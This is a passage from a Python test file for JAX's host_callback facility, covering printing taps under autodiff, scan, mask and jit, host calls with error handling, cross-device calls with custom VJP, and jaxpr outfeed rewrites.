TBD""", testing_stream.output)
  testing_stream.reset()
# NOTE(review): method name has a doubled "tap_tap" prefix; likely intended
# test_tap_scan_custom_jvp — confirm before renaming (test selection patterns
# may reference the current name).
def test_tap_tap_scan_custom_jvp(self):
  """custom JVP, inside scan.
  This exercises the custom_jvp_call_jaxpr primitives."""

  @api.custom_jvp
  def f(x):
    return x * hcb.id_print(x, output_stream=testing_stream, what="x")

  @f.defjvp
  def f_jvp(primals, tangents):
    x, = primals
    x_dot, = tangents
    primal_out = f(x)
    tangent_out = 3. * x * hcb.id_print(x_dot, output_stream=testing_stream, what="x_dot")
    return primal_out, tangent_out

  def g(x):
    # Sum f(x_i)
    return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
                    np.full(x.shape[1:], 0.),  # Like x w/o leading dim
                    x)[0]

  arg = np.full((2,), 0.7)
  self.assertAllClose(0.7 * 0.7 * 2, g(arg))
  hcb.barrier_wait()
  self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
  testing_stream.reset()

  # Under grad, the custom tangent rule's tap shows up transposed.
  self.assertAllClose(np.array([2.1, 2.1]), api.grad(g)(arg), check_dtypes=False)
  hcb.barrier_wait()
  self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
transforms: ['transpose'] what: x_dot
2.1
transforms: ['transpose'] what: x_dot
2.1""", testing_stream.output)
def test_tap_scan_custom_vjp(self):
  """custom VJP, inside scan.
  This exercises the custom_vjp_call_jaxpr primitives."""

  @api.custom_vjp
  def f(x):
    return x * hcb.id_print(x, output_stream=testing_stream, what="x")

  # f_fwd: a -> (b, residual)
  def f_fwd(x):
    return f(x), 3. * x

  # f_bwd: (residual, CT b) -> [CT a]
  def f_bwd(residual, ct_b):
    return residual * hcb.id_print(ct_b, output_stream=testing_stream, what="ct_b"),

  f.defvjp(f_fwd, f_bwd)

  def g(x):
    # Sum f(x_i)
    return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
                    np.full(x.shape[1:], 0.),  # Like x w/o leading dim
                    x)[0]

  arg = np.full((2,), 0.7)
  self.assertAllClose(0.7 * 0.7 * 2, g(arg))
  hcb.barrier_wait()
  self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
  testing_stream.reset()

  # Under grad, the bwd rule's tap of the cotangent appears as well.
  self.assertAllClose(np.array([2.1, 2.1]), api.grad(g)(arg), check_dtypes=False)
  hcb.barrier_wait()
  self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
what: ct_b
1.
what: ct_b
1.""", testing_stream.output)
def test_tap_mask(self):
  """id_print under api.mask, also composed with vmap, jvp and jit."""

  @partial(api.mask, in_shapes=['n'], out_shape='')
  def padded_sum(x):
    three_x = hcb.id_print((x, 2 * x), result=3 * x, what="x",
                           output_stream=testing_stream)
    return jnp.sum(three_x)

  x = np.arange(5.)
  self.assertAllClose(9., padded_sum([x], dict(n=3)))
  hcb.barrier_wait()
  # The tap shows the padded values plus the logical shapes.
  self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )""", testing_stream.output)
  testing_stream.reset()

  # With VMAP
  xv = np.arange(10.).reshape((2, 5))  # logical_shape = 5
  self.assertAllClose(
      np.array([9., 78.]),
      # batch_size = 2, n=3 and 4 for the two elements
      api.vmap(padded_sum)([xv],
                           dict(n=np.array([3., 4.]))))
  hcb.barrier_wait()
  self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), ('batch', {'batch_dims': (0, 0, 0, 0)})] what: x
( ( [[0. 1. 2. 3. 4.]
[5. 6. 7. 8. 9.]]
[[ 0. 2. 4. 6. 8.]
[10. 12. 14. 16. 18.]] )
( ( [3. 4.] )
( [3. 4.] ) ) )""", testing_stream.output)
  testing_stream.reset()

  # With JVP
  self.assertAllClose((9., 0.9),
                      api.jvp(lambda arg: padded_sum([arg], dict(n=3)),
                              (x,), (x * 0.1,)))
  hcb.barrier_wait()
  self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), 'jvp'] what: x
( ( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )
( ( [0. 0.1 0.2 0.3 0.4]
[0. 0.2 0.4 0.6 0.8] )
( ( False )
( False ) ) ) )""", testing_stream.output)
  testing_stream.reset()

  # Now with JIT
  self.assertAllClose(9., api.jit(padded_sum)([x], dict(n=3)))
  hcb.barrier_wait()
  self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )""", testing_stream.output)
  testing_stream.reset()
def test_tap_callback_delay(self):
  """Taps keep working when every callback invocation is slowed down."""
  # Artificially delay each callback by one second.
  hcb.callback_extra = lambda dev: time.sleep(1)

  def chained_prints(x):
    for step in range(5):
      x = hcb.id_print(x * step, what="x times i")
    return x

  api.jit(chained_prints)(np.arange(6, dtype=np.float32).reshape((2, 3)))
def test_tap_callback_delay_barrier(self):
  """barrier_wait must block until slow (2s) callbacks have been consumed."""
  hcb.callback_extra = lambda dev: time.sleep(2)

  def func(x):
    for i in range(1, 4):
      x = hcb.id_print(x * i, what="x times i", output_stream=testing_stream)
    return x

  api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
  # Wait for the results
  hcb.barrier_wait()
  expected = """
what: x times i
[[0. 1. 2.]
[3. 4. 5.]]
what: x times i
[[ 0. 2. 4.]
[ 6. 8. 10.]]
what: x times i
[[ 0. 6. 12.]
[18. 24. 30.]]"""
  self.assertMultiLineStrippedEqual(expected, testing_stream.output)
  testing_stream.reset()
  # Call again
  api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
  hcb.barrier_wait()
  self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_error_bad_consumer_id(self):
  """Try to use reserved consumer ID 0.

  Check that we get the proper error from the runtime."""
  comp = xla_bridge.make_computation_builder(self._testMethodName)
  token = hcb.xops.CreateToken(comp)
  hcb._initialize_outfeed_receiver()  # Needed if this is the sole test
  with self.assertRaisesRegex(RuntimeError,
                              "Consumer ID cannot be a reserved value: 0"):
    hcb._outfeed_receiver.receiver.add_outfeed(
        comp, token, 0,
        [xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
def test_tap_error_different_shapes(self):
  """Try to register different shapes for the same consumer ID."""
  comp = xla_bridge.make_computation_builder(self._testMethodName)
  token = hcb.xops.CreateToken(comp)
  hcb._initialize_outfeed_receiver()  # Needed if this is the sole test
  # First registration of consumer 123 with f32[2, 3] succeeds.
  hcb._outfeed_receiver.receiver.add_outfeed(
      comp, token, 123,
      [xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
  # Same consumer ID with a different dtype must be rejected.
  with self.assertRaisesRegex(
      RuntimeError, ".*does not match previous shape element_type.*"):
    hcb._outfeed_receiver.receiver.add_outfeed(
        comp, token, 123,
        [xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.int32))])
  # Same consumer ID with a different rank/shape must also be rejected.
  with self.assertRaisesRegex(
      RuntimeError, ".*does not match previous shape element_type.*"):
    hcb._outfeed_receiver.receiver.add_outfeed(
        comp, token, 123,
        [xla_bridge.constant(comp, np.zeros((2,), dtype=np.float32))])
def test_tap_id_tap_removed_kwargs(self):
  """Passing **kwargs to id_tap must raise TypeError (support was removed)."""
  def tap_func(x, transforms, y):
    pass

  expected_msg = r"Support for \*\*kwargs in ``id_tap``"
  with self.assertRaisesRegex(TypeError, expected_msg):
    hcb.id_tap(tap_func, 1, y=2)
def test_tap_odeint(self):
  """id_print inside odeint under grad must not fail (regression for #4015)."""
  # TODO: find a smaller repro for bug #4015
  # Seems to be xla_call(scan(xla_call)), all under grad.
  from jax.experimental.ode import odeint

  def f(x, t, k):
    x = hcb.id_print(x)
    return -k * x

  def loss(k=1.0):
    t = jnp.linspace(0, 0.001, num=2)
    xs = odeint(f, 1.0, t, k)
    return xs[-1]

  api.grad(loss)(1.0)  # should not fail
def test_tap_remat(self):
  """id_print composes with api.remat inside fori_loop."""
  def f(i, k):
    x = hcb.id_print(k + i, output_stream=testing_stream)
    return k * x

  def loss(k):
    return lax.fori_loop(0, 2, api.remat(f), k)

  print(loss(3))
  hcb.barrier_wait()
  expected = """
3
10"""
  self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_named_call(self):
  """Taps inside api.named_call, under lax.scan."""
  def tap_scalar(init, do_print=False):
    @partial(api.named_call, name="step")
    def step(acc, step_nr):
      acc = acc + step_nr
      maybe_print(do_print, step_nr, what="step_nr")
      return acc, None

    return lax.scan(step, init, np.arange(2))

  # Printing must not change the scan result.
  self.assertAllClose(tap_scalar(3., do_print=False), tap_scalar(3., do_print=True))
  hcb.barrier_wait()
  expected = """
what: step_nr
0
what: step_nr
1"""
  self.assertMultiLineStrippedEqual(expected, testing_stream.output)
class HostCallbackCallTest(jtu.JaxTestCase):
  """Tests for hcb.call"""

  def setUp(self):
    # host_callback is known-broken on multi-GPU platforms; skip there.
    if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
      raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
    testing_stream.reset()
    testing_stream.test_method_name = self._testMethodName
    super().setUp()

  def tearDown(self) -> None:
    # Drain outstanding callbacks so failures do not leak across tests.
    hcb.barrier_wait("HostCallbackCallTest.tearDown")
    super().tearDown()

  def call_log_testing_stream(self, func, arg, *, result_shape, name=""):
    """Call `func` and log inputs and outputs to the testing stream"""

    def call_log(arg):
      def val2str(v):
        # NOTE(review): formats the closed-over `arg`, not the parameter `v`,
        # so the "= ..." line logs the input again rather than the result.
        # Masked today because tests use identity-like callbacks, and the
        # golden output in test_call_no_result depends on this behavior —
        # confirm intent before changing.
        return np.array2string(np.array(arg))
      testing_stream.write(f"Call {name}({val2str(arg)})\n")
      res = func(arg)
      testing_stream.write(f"  = {val2str(res)}\n")
      return res
    return hcb.call(call_log, arg, result_shape=result_shape)

  def test_call_simple(self):
    """hcb.call of a pure function matches running the function inline."""

    def f_outside(args):
      x, y = args
      return x * y

    def fun(x, use_outside=True):
      return 2 * (hcb.call(f_outside, (x, x + 1),
                           result_shape=x)
                  if use_outside else f_outside((x, x + 1)))

    res_inside = fun(2, use_outside=False)
    self.assertAllClose(res_inside, fun(2, use_outside=True))

  def test_call_empty_arg(self):
    """Call with empty array."""
    result = np.ones((2,), dtype=np.float32)

    def f_outside(_):
      return result

    def fun(x):
      return x + hcb.call(f_outside, (),
                          result_shape=api.ShapeDtypeStruct(result.shape, result.dtype))

    self.assertAllClose(2. + result, fun(2.))

  def test_call_empty_result(self):
    """Call returning empty array."""
    result_shape = (2, 0)

    def f_outside(_):
      return np.ones(result_shape, dtype=np.float32)

    def fun(x):
      return x + hcb.call(f_outside, 1.,
                          result_shape=api.ShapeDtypeStruct(result_shape, np.float32))

    self.assertAllClose(f_outside(0.), fun(2.))

  def test_call_empty_result_inside_pytree(self):
    """Call returning a tuple with an empty array and a non-empty one."""
    result_shape_0 = (2, 0)
    result_shape_2 = (0,)

    def f_outside(_):
      return (np.ones(result_shape_0, dtype=np.float32),
              np.ones((1,), dtype=np.float32),
              np.ones(result_shape_2, dtype=np.float32))

    def fun(x):
      res = hcb.call(f_outside, 1.,
                     result_shape=(api.ShapeDtypeStruct(result_shape_0, np.float32),
                                   api.ShapeDtypeStruct((1,), np.float32),
                                   api.ShapeDtypeStruct(result_shape_2, np.float32)))
      self.assertEqual(result_shape_0, res[0].shape)
      self.assertEqual(result_shape_2, res[2].shape)
      return x + res[1]

    self.assertAllClose(2 + np.ones((1,), dtype=np.float32), fun(2.))

  def test_call_empty_result_all_pytree(self):
    """Call returning a tuple of empty arrays."""
    result_shape = (2, 0)

    def f_outside(_):
      return (np.ones(result_shape, dtype=np.float32),
              np.ones(result_shape, dtype=np.float32))

    def fun(x):
      res = hcb.call(f_outside, 1.,
                     result_shape=(api.ShapeDtypeStruct(result_shape, np.float32),
                                   api.ShapeDtypeStruct(result_shape, np.float32)))
      return x + res[0] + res[1]

    self.assertAllClose(np.ones(result_shape, dtype=np.float32),
                        fun(2.))

  def test_call_no_result(self):
    """A callback with result_shape=None is run for its side effects only."""

    def f_outside(arg):
      self.call_log_testing_stream(lambda x: None, arg,
                                   result_shape=None,
                                   name="outside")
      return arg

    self.assertAllClose((3., 4.), f_outside((3., 4.)))
    hcb.barrier_wait()
    expected = """
Call outside([3. 4.])
= [3. 4.]"""
    self.assertMultiLineStrippedEqual(expected, testing_stream.output)

  def test_call_cond(self):
    """hcb.call from inside a lax.cond branch, under fori_loop."""

    def f_outside(args):
      x, y = args
      return x * y

    def loop(x, use_outside=True):
      def body(i, acc):
        return lax.cond(i % 2 == 1,
                        lambda _: (hcb.call(f_outside, (acc, i),
                                            result_shape=acc)
                                   if use_outside else f_outside((acc, i))),
                        lambda _: acc,
                        None)

      return lax.fori_loop(0, 18, body, x)

    res_inside = loop(1.2, use_outside=False)
    self.assertAllClose(res_inside, loop(1.2, use_outside=True))

  def test_call_jit_scan_call(self):
    """hcb.call inside a scan body, all under jit."""

    def f_outside(x):
      return x

    def loop(x, use_outside=True):
      def body(carry, i):
        if use_outside:
          return carry + hcb.call(f_outside, i,
                                  result_shape=i), None
        else:
          return carry + i, None

      return lax.scan(body, 0, x)

    x = np.arange(5, dtype=np.int32)

    res_outside = api.jit(partial(loop, use_outside=True))(x)
    self.assertAllClose(res_outside, loop(x, use_outside=False))

  def test_call_doc_example1(self):
    """Examples from the documentation: simplest, call a function"""

    def host_eig(x):
      return np.linalg.eigvals(x)

    shape = (2, 5, 4, 4)

    m = np.ones(shape, dtype=np.float32)

    def fun(m):
      eig_m = hcb.call(host_eig, m,
                       result_shape=api.ShapeDtypeStruct(m.shape[:-1], m.dtype))
      return eig_m

    expected_res = np.linalg.eigvals(m)
    self.assertAllClose(expected_res, fun(m))

  def test_call_doc_example_hlo(self):
    """Examples from the documentation: simplest, call a function"""

    def fun(m):
      # Bug fix: the callback previously returned the `np.cos` function
      # object itself (`lambda x: np.cos`) instead of applying it, which
      # cannot satisfy result_shape=m.
      return jnp.sin(hcb.call(lambda x: np.cos(x),
                              jnp.cos(m),
                              result_shape=m))

    m = np.ones((2,), np.float32)
    helper_print_optimized_hlo(fun, m)

    def fun(m):
      x = hcb.call(lambda x: None, 2, result_shape=())
      return x

    m = np.ones((2,), np.float32)
    helper_print_optimized_hlo(fun, m)

  def test_call_with_device(self):
    """call_with_device=True passes the executing device to the callback."""

    def callback_func(x, device=None):
      testing_stream.write(f"device: {device}\n Called with {x}")
      return x

    def func(x):
      return hcb.call(callback_func, x,
                      result_shape=x,
                      call_with_device=True)

    self.assertEqual(3., func(3.))
    assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 3.00""")
    testing_stream.reset()

  def test_call_pmap(self):
    # Works for 1 or 2 devices
    def callback_func(x, device=None):
      testing_stream.write(f"device: {device}\n Called with {x}")
      return x * np.array(3, np.int32)

    def fun(x):  # x: i32
      return hcb.call(callback_func, x * 2,
                      result_shape=x,
                      call_with_device=True)

    xv = jnp.arange(len(devices()), dtype=jnp.int32)
    res = api.pmap(fun)(xv)
    self.assertAllClose(api.pmap(lambda x: x * 6)(xv), res)
    # Assertion text is for 2 devices (also works for 1 device)
    assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 0
device: cpu:1
Called with 2""")
    testing_stream.reset()

  def test_call_vmap(self):
    """hcb.call has no batching rule; vmap must raise."""

    def f_outside(x): return x

    def fun(x):
      return hcb.call(f_outside, x, result_shape=x)

    with self.assertRaisesRegex(NotImplementedError,
                                "batching rules are implemented only for id_tap, not for call"):
      api.vmap(fun)(np.ones((2, 3)))

  def test_call_error_bad_result_shape(self):
    """result_shape must be numeric scalars or shape/dtype-carrying objects."""
    with self.assertRaisesRegex(
        ValueError,
        "The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
      hcb.call(lambda x: x, 3., result_shape="string")

    with self.assertRaisesRegex(
        ValueError,
        "The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
      hcb.call(lambda x: x, 3., result_shape=lambda x: x)
      hcb.barrier_wait("wait for error")

  def helper_check_callback_errors(self, thunk: Callable,
                                   expected_exc_txt: str):
    """Calls thunk() and checks for expected exceptions.
    """
    if jtu.device_under_test() == "cpu":
      # On CPU the runtime crashes, and the tests are all aborted
      raise SkipTest("TODO: CPU runtime crashes on unexpected infeed")
    elif jtu.device_under_test() == "gpu":
      # On GPU we get a nice error back to Python
      with self.assertRaisesRegex(
          RuntimeError,
          "RET_CHECK failure .* Mismatch between infeed source buffer shape s8.12345."):
        thunk()
    elif jtu.device_under_test() == "tpu":
      # On TPU we get no error!!!
      raise SkipTest("TODO: TPU runtime does not check infeed, and just computes with garbage")

    # Both on GPU and TPU we also get an error during the barrier_wait at the
    # end of the test. Run a barrier_wait now, to consume that error.
    with self.assertRaisesRegex(
        hcb.CallbackException,
        re.compile(
            "There were exceptions during callback processing.*Last one was:.*" +
            expected_exc_txt,
            re.DOTALL)):
      hcb.barrier_wait("Waiting for error")

  def test_call_error_callback_throws_exception(self):
    """An exception in the host callback surfaces via CallbackException."""

    def f_outside(x):
      raise ValueError("user exception")

    def fun(x):
      return hcb.call(f_outside, x, result_shape=x)

    self.helper_check_callback_errors(lambda: fun(3.),
                                      "ValueError: user exception")

  def test_call_error_callback_returns_unexpected_shape(self):
    """A callback result not matching result_shape is reported as an error."""

    def fun(x):
      return hcb.call(lambda x: (x, x), x, result_shape=x)

    self.helper_check_callback_errors(lambda: fun(3.),
                                      "Callback func .* should have returned a result with pytree")

  def test_call_error_then_compute(self):
    # Continue computation on device after error
    def f_outside(x):
      raise ValueError("user exception")

    def fun(x):
      x1 = hcb.call(f_outside, x, result_shape=x)
      return x1

    arg = np.arange(3, dtype=np.int32)
    self.helper_check_callback_errors(lambda: self.assertAllClose(arg, fun(arg)),
                                      "ValueError: user exception")
def call_jax_other_device(jax_outside_fun, arg, *, device):
  """Calls a JAX function on a specific device with simple support for reverse AD.

  Functions whose name starts with "jax_outside" are called on another device,
  by way of hcb.call.
  """

  def run_jax_outside_fun(arg):
    # jit + device_put pin the "outside" computation to the requested device.
    return api.jit(jax_outside_fun)(api.device_put(arg, device))

  @api.custom_vjp
  def make_call(arg):
    return hcb.call(run_jax_outside_fun, arg,
                    result_shape=api.eval_shape(jax_outside_fun, arg))

  # Define the fwd and bwd custom_vjp functions
  def make_call_vjp_fwd(arg):
    # Return the primal argument as the residual. Use `make_call` for the
    # primal computation to enable higher-order AD.
    return make_call(arg), arg  # Return the primal argument as the residual

  def make_call_vjp_bwd(res, ct_res):
    arg = res  # residual is the primal argument

    def jax_outside_vjp_fun(arg_and_ct):
      arg, ct = arg_and_ct
      _, f_vjp = api.vjp(jax_outside_fun, arg)
      ct_in, = f_vjp(ct)
      return ct_in

    # Recurse, so the cotangent is also computed on `device` and remains
    # differentiable (supports grad-of-grad).
    return (call_jax_other_device(jax_outside_vjp_fun, (arg, ct_res), device=device),)

  make_call.defvjp(make_call_vjp_fwd, make_call_vjp_bwd)
  return make_call(arg)
class CallJaxTest(jtu.JaxTestCase):
  """Tests using `call_jax_other_device`."""

  def setUp(self):
    if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
      raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")

    cpu_devices = api.devices("cpu")
    if jtu.device_under_test() != "cpu":
      # Accelerator under test: route "outside" calls to the first CPU device.
      assert cpu_devices
      self.outside_device = cpu_devices[0]
    else:
      # CPU under test: a second CPU device must host the "outside" call.
      if len(cpu_devices) == 1:
        raise SkipTest("Test needs at least two devices. On CPU use XLA_FLAGS=--xla_force_host_platform_device_count=2")
      self.outside_device = cpu_devices[1]
    super().setUp()

  def test_jax_impl(self):
    """Primal evaluation through the other device matches the direct one."""
    def f_jax(x):
      return jnp.sin(x)

    def f_outside(x):
      return call_jax_other_device(f_jax, x, device=self.outside_device)

    expected = f_jax(3.)
    self.assertAllClose(expected, f_outside(3.))
    self.assertAllClose(expected, api.jit(f_outside)(3.))

  def test_jax_impl_pytree(self):
    """Pytree inputs and outputs round-trip through the other device."""
    def f_jax(x):
      # x : dict(a=..., b=...) and output is a list of two elements
      return [jnp.sin(x["a"]), jnp.sin(x["b"])]

    def f_outside(x):
      return call_jax_other_device(f_jax, x, device=self.outside_device)

    arg = dict(a=3., b=4.)
    self.assertAllClose(f_jax(arg), f_outside(arg))

  def test_jax_grad(self):
    """Reverse AD works across the device boundary."""
    def f_jax(x):
      return 2. * jnp.sin(x)

    def f_outside(x):
      return 2. * call_jax_other_device(jnp.sin, x, device=self.outside_device)

    self.assertAllClose(api.grad(f_jax)(3.), api.grad(f_outside)(3.))

  def test_jax_grad_pytree(self):
    """Reverse AD works for pytree inputs across the device boundary."""
    def f_jax(x):
      # x : dict(a=..., b=...) and output is a float
      return 3. * jnp.sin(x["a"]) + jnp.sin(x["b"])

    def f_outside(x):
      return call_jax_other_device(f_jax, x, device=self.outside_device)

    arg = dict(a=3., b=4.)
    self.assertAllClose(api.grad(f_jax)(arg), api.grad(f_outside)(arg))

  def test_jax_grad_of_grad(self):
    """Second-order AD works across the device boundary."""
    def f_jax(x):
      return 2. * x * x * x

    def f_outside(x):
      return 2. * call_jax_other_device(lambda x: x * x * x, x, device=self.outside_device)

    self.assertAllClose(api.grad(api.grad(f_jax))(5.),
                        api.grad(api.grad(f_outside))(5.))
class OutfeedRewriterTest(jtu.JaxTestCase):
def setUp(self):
  # host_callback is known-broken on multi-GPU platforms; skip there.
  if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
    raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
  super().setUp()
def assertRewrite(self, expected: str, func: Callable, args: Sequence,
                  has_input_token=True, has_output_token=True):
  """Check that the rewrite of func(*args) matches expected.

  NOTE: the textual comparison below is deliberately disabled; currently this
  only checks that the rewrite itself runs without error.
  """
  jaxpr = api.make_jaxpr(func)(*args)
  rewritten = hcb._rewrite_closed_jaxpr(jaxpr,  # noqa: F841
                                        has_input_token, has_output_token)
  # Since it is somewhat annoying to update the Jaxpr assertions when we change
  # the Jaxpr printing, we do not check these by default. It is recommended that
  # before making changes to the code generation and Jaxpr rewriting, turn on
  # the checking, update the expected Jaxpr, and then make the changes.
  # assertMultiLineStrippedEqual(self, expected, str(rewritten))
  del rewritten
def test_no_outfeed(self):
  """A jaxpr with no taps is left unchanged (modulo threaded tokens)."""
  self.assertRewrite("""
{ lambda ; a.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_input_token=False,
                     has_output_token=False)
  self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c,) }""", lambda x: x + x * x, [0], has_output_token=False)
  self.assertRewrite("""
{ lambda ; a d e.
let b = mul a a
c = add a b
in (c, d, e) }""", lambda x: x + x * x, [0])
def test_simple_outfeed(self):
  """A single id_print becomes an outside_call threading the tokens."""
  self.assertRewrite("""
{ lambda ; a d e.
let b = add a a
c f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b d e
in (c, f, g) }""", lambda x: hcb.id_print(x + x), [0])
def test_simple_outfeed_without_input_token(self):
  """Without an input token, create_token is inserted from the invars."""
  self.assertRewrite("""
{ lambda ; a b.
let e = create_token a b
f = create_token a b
c = add a b
d g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c e f
in (d,) }""", lambda x1, x2: hcb.id_print(x1 + x2), [1, 2],
                     has_input_token=False, has_output_token=False)
def test_simple_outfeed_without_input_token_nor_invars(self):
  """With neither token nor invars, create_token takes no arguments."""
  self.assertRewrite("""
{ lambda ; .
let b = create_token
c = create_token
a d e = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] 42 b c
in (a,) }""", lambda: hcb.id_print(42), [],
                     has_input_token=False, has_output_token=False)
def test_multiple_tap_without_dependencies(self):
  """Independent taps are sequenced through the threaded token pair."""
  def f(x):
    hcb.id_print(x, what="x")
    hcb.id_print(x + 1, what="x + 1")
    return 2

  self.assertRewrite("""
{ lambda ; a c d.
let _ e f = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a c d
b = add a 1
_ g h = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] b e f
in (2, g, h) }""", f, [1])
def test_cond(self):
  """Both cond branches are rewritten to accept and return tokens."""
  y = jnp.ones(5)  # captured const

  def func(x, z):
    return lax.cond(z > 0, (1, 2), lambda a: (a[0], jnp.zeros(5)),
                    z, lambda a: (hcb.id_print(a), y))

  self.assertRewrite("""
{ lambda a ; b c h i.
let d = gt c 0
e = convert_element_type[ new_dtype=int32 ] d
f g j k =
cond[ branches=( { lambda ; a b c d f g.
let e h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] d f g
in (e, a, h, i) }
{ lambda ; f_ a b c g h.
let d = broadcast_in_dim[ broadcast_dimensions=( )
shape=(5,) ] 0.00
in (a, d, g, h) } )
linear=(False, False, False, False, False, False) ] e a 1 2 c h i
in (f, g, j, k) }""", func, [y, 5])
def test_while(self):
  """A while_loop with a tap in the body threads tokens through the carry."""
  ct_body = jnp.ones(5, np.float32)  # captured const for the body
  ct_cond = jnp.ones(5, np.float32)  # captured const for the conditional

  def func(x):
    # x: f32[5]
    # c: (f32[5], f32)
    return lax.while_loop(lambda c: c[1] < jnp.sum(c[0] + ct_cond),
                          lambda c: (ct_body, hcb.id_print(c[1]) + 1.),
                          (x, np.float32(1.)))

  self.assertRewrite("""
{ lambda a b ; c f g.
let d e h i =
while[ body_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1.00
in (a, e, h, i) }
body_nconsts=1
cond_jaxpr={ lambda ; a b c g h.
let d = add b a
e = reduce_sum[ axes=(0,) ] d
f = lt c e
in (f,) }
cond_nconsts=1 ] a b c 1.00 f g
in (d, e, h, i) }""", func, [ct_body])
def test_while_pred_outfeed(self):
  """A while with outfeed in the pred."""
  # A tap in the predicate forces the rewrite into the cond_before/body/
  # cond_body form: the predicate is evaluated once before the loop and
  # re-evaluated inside the body so tokens can be threaded through it.
  ct_body = jnp.ones(5)  # captured const for the body
  ct_cond = jnp.ones(2)  # captured const for the conditional

  def func(x):
    return lax.while_loop(lambda c: hcb.id_print(ct_cond, result=c[1]) < 5,
                          lambda c: (ct_body, hcb.id_print(c[1]) + 1),
                          (x, 1))

  self.assertRewrite("""
{ lambda a b ; c f g.
let j k l = xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_before ] a c 1 f g
bf d e h i =
while[ body_jaxpr={ lambda ; r s t u v w x.
let y z ba bb =
xla_call[ call_jaxpr={ lambda ; a b c f g.
let d h i = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] c f g
e = add d 1
in (a, e, h, i) }
donated_invars=(False, False, False, False, False)
name=body ] s u v w x
bc bd be =
xla_call[ call_jaxpr={ lambda ; a b c g h.
let d i j = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a g h
e = id_tap_dep c d
f = lt e 5
in (f, i, j) }
donated_invars=(False, False, False, False, False)
name=cond_body ] r y z ba bb
in (bc, y, z, bd, be) }
body_nconsts=2
cond_jaxpr={ lambda ; m n o p q.
let
in (m,) }
cond_nconsts=0 ] a b j c 1 k l
in (d, e, h, i) }""", func, [ct_body])
def test_scan(self):
  """A scan with a tap in the body carries the token pair as extra carry."""
  y = jnp.ones(5)  # captured const

  def func(x):
    return lax.scan(lambda c, a: (hcb.id_print(c), y), (1, 2), x)

  self.assertRewrite("""
{ lambda a ; b f g.
let c d h i e =
scan[ jaxpr={ lambda ; a b c g h d.
let e f i j =
outside_call[ arg_treedef=PyTreeDef(tuple, [*,*])
callback=...
has_token=True
identity=True ] b c g h
in (e, f, i, j, a) }
length=5
linear=(False, False, False, False, False, False)
num_carry=4
num_consts=1
reverse=False
unroll=1 ] a 1 2 f g b
in (c, d, e, h, i) }""", func, [y])
def test_scan_custom_jvp(self):
  """custom JVP, inside scan.
  This exercises the custom_jvp_call_jaxpr primitives."""

  @api.custom_jvp
  def f(x):
    return x * hcb.id_print(x)

  @f.defjvp
  def f_jvp(primals, tangents):
    x, = primals
    x_dot, = tangents
    primal_out = f(x)
    tangent_out = 3. * x * hcb.id_print(x_dot)
    return primal_out, tangent_out

  def g(x):
    # Sum f(x_i)
    return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
                    np.full(x.shape[1:], 0.),  # Like x w/o leading dim
                    x)[0]

  arg = np.full((5,), 0.7)
  # Expected rewrite of the primal computation.
  self.assertRewrite("""
{ lambda ; a c d.
let b e f _ =
scan[ jaxpr={ lambda ; a e f b.
let c g h = custom_jvp_call_jaxpr[ fun_jaxpr={ lambda ; a d e.
let b f g = outside_call[ arg_treedef=*
callback=...
has_token=True
identity=True ] a d e
c = mul a b
in (c, f, g) }
num_consts=0 ] b e f
d = add a c
in (d, g, h, 0.00) }
length=5
linear=(False, False, False, False)
num_carry=3
num_consts=0
reverse=False
unroll=1 ] 0.00 c d a
in (b, e, f) }""", g, [arg])
  # Expected rewrite under grad: forward scan, then a reversed transposed
  # scan whose tap carries the 'transpose' transform.
  self.assertRewrite("""
{ lambda ; a d e.
let _ _ f g _ b =
scan[ jaxpr={ lambda ; a b h i c d.
